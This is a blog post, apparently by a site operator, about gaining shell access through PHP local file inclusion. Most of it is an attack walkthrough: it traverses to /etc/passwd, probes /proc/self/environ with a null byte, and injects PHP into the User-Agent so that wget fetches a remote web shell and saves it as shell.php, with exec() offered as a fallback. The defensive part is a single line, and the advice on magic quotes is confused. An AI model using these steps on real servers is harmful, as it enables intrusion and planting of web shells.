Gaining Shell Access via Local File Inclusion Vulnerabilities

Introduction

Security lockMy firewall caught some odd injection attempts which lead to research on the intent of the hackers.  Turns out it was an attempt to gain Shell access via Local File Inclusion vulnerabilities and injection of malicious code in proc/self/environ.  Research lead to the following step-by-step instructions on what was being attempted (listed below).

Local File Inclusion, or LFI, allows dynamic execution of interpreted code loaded through a file, a big no-no.  File inclusion exploits look for features in installed software systems that contain file storage mechanisms such as changing avatars in discussion boards or uploading files.

The “self” link (e.g. proc/self/environ) needs to be explained too.  To allow the export of process information to usermode, Linux provides “self” to give a process access to its own process information.

If you’re being probed or attacked, something like this will appear in your log files:

//index.php?option=com_xxxxxxxx&id=../../../../../../../../../../../../../../../../proc/self/environ%00

The %00 at the end of the string is interesting. %00 is known as a "poison null byte".  Turning off Magic Quotes, which were removed in PHP 6, will squash this.

Magic Quotes is a process that automatically escapes incoming data in PHP script.   Magic Quotes were introduced in PHP for newbie programmers who might not code for prevention of injection attacks but the introduction of Magic Quotes caused more problems than it corrected.  It’s preferable to code with magic quotes off and to instead escape the data at runtime, as needed.  To disable Magic Quotes, add the following to php.ini in the directory that scripts are located in:

; Magic quotes
;

; Magic quotes for incoming GET/POST/Cookie data.
magic_quotes_gpc = Off

; Magic quotes for runtime-generated data, e.g. data from SQL, from exec(), etc.
magic_quotes_runtime = Off

; Use Sybase-style magic quotes (escape ' with '' instead of \').
magic_quotes_sybase = Off

It also may be possible to turn off Magic Quotes in .htaccess:

php_flag magic_quotes_gpc Off

php_value magic_quotes_gpc Off

To find a LFI vulnerable website:

www.website.com/view.php?page=contact.php

1 – Replace contact.php with ../ so the URL will become

www.website.com/view.php?page=../

Probably receive this error (which means there’s a good chance a vulnerability exists): Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/yoursite/public_html/website.com/view.php on line 1428

2 – Check for etc/passwd to see the if is Local File Inclusion vulnerability exists:

http://www.website.com/view.php?page…/../etc/passwd

May receive this error: Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/yoursite/public_html/website.com/view.php on line 1337

Try walking the directory paths to find the passwd file:

http://www.website.com/view.php?page…/../etc/passwd

Once found, you’ll see this:

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin

3 – Next check to see if proc/self/environ is accessible

Replace etc/passwd with proc/self/environ

http://www.website.com/view.php?page…c/self/environ

If you see something like this then proc/self/environ is accessible.  If you got a blank page,an error proc/self/environ is not accessible or the OS is FreeBSD.

DOCUMENT_ROOT=/home/yoursite/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2a d7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fpr oc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc% 2Fself%2Fenviron SCRIPT_FILENAME=/home/yoursite/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80

4 – Download tamper data firefox extension, change the User-Agent.Start Tamper Data in Firefox.  Execute the following code – submit this request:

<?system(‘wget http://website.com/Shells/gny.txt -O shell.php’);?>

If this command is able to execute, it will download a .txt shell which will be saved as shell.php.

Note that system() can be disabled by the operator through php.ini. Try exec() in its place.

5 – Access the shell

Try: www.website.com/shell.php

If able to access then the shell was successfully created.

Prevention

Of course good firewall software will eliminate this vulnerability.  In addition, input validation may work.

Print Friendly, PDF & Email

You may also like...

%d bloggers like this: